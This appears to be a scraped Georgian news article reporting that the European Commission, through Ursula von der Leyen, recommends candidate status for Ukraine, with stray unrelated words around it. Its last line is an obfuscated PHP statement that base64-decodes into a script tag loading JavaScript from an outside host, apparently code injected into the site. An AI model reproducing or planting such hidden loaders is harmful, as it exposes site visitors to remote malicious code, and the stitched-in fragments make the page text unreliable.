celsiusi
ავერსი საქკაბელი
ევროკომისიის პრეზიდენტის, ურსულა ფონ დერ ლაიენის განცხადებით, ევროკომისიამ უკრაინისთვის კანდიდატი ქვეყნის სტატუსის მინიჭებას რეკომენდაცია გაუწია. ამ თემაზე მან განცხადება ცოტა ხნის წინ გააკეთა:
 
"მინდა დავიწყო უკრაინით, კომისია რეკომენდაციას იძლევა საბჭოსადმი, რომ უკრაინას მიეცეს ევროპერსპექტივა და ამავდროულად კანდიდატის სტატუსიც. ეს რა თქმა უნდა, არის იმის საფუძველზე გაკეთებული, რომ ქვეყანაში შემდგომი მნიშვნელოვანი რეფორმები განხორციელდება", - თქვა ურსულა ფონ დერ ლაიენმა. 
 
მისი თქმით, ეს იმის საფუძველზე კეთდება, რომ ქვეყანა შემდგომ მნიშვნელოვან რეფორმებს გაატარებს. ევროკომისიის მოსაზრებით, უკრაინამ ნამდვილად აჩვენა, რომ ქვეყანას აქვს მისწრაფება იმისთვის, რომ ევროპული სტანდარტები და ფასეულობები ჰქონდეს დამკვიდრებული. 
 
ლაიენმა აღნიშნა, რომ 8 წელია ქვეყანა ევროკავშირს უახლოვდება. მისი თქმით, უკრაიანს შესრულებული აქვს ასოცირების შეთანხმების დაახლოებით 70% და რომ ქვეყანას ძლიერი საპარლამენტო საპრეზიდენტო დემოკრატია გააჩნია.
556
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");